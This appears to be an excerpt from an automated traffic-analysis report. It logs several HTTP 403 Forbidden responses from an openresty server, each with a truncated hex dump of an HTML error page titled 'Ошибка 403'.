69 7a 69
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:03:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:03:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:03:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:03:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:03:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:03:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:03:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 